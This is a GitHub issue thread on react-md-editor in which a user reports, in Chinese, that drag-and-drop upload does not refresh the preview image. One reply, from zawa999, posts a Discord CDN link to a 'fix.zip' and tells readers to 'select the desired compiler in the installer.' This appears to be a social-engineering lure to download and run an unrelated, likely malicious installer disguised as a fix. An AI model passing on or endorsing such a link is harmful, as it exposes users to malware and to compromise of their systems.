### ISSUE TITLE
拖拽上传 无法更新预览图片

### ISSUE THREAD

**Issue by fangruihuan-tech** [uiwjs/react-md-editor#656]
反应-下降区 实现拖拽 无法更新图片
 复制粘贴 无法复制excel doc 格式

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by fangruihuan-tech** [comment]
链接 无法打开 谢谢

**Comment by fangruihuan-tech** [comment]
已解决

**Comment by fangruihuan-tech** [comment]
已解决
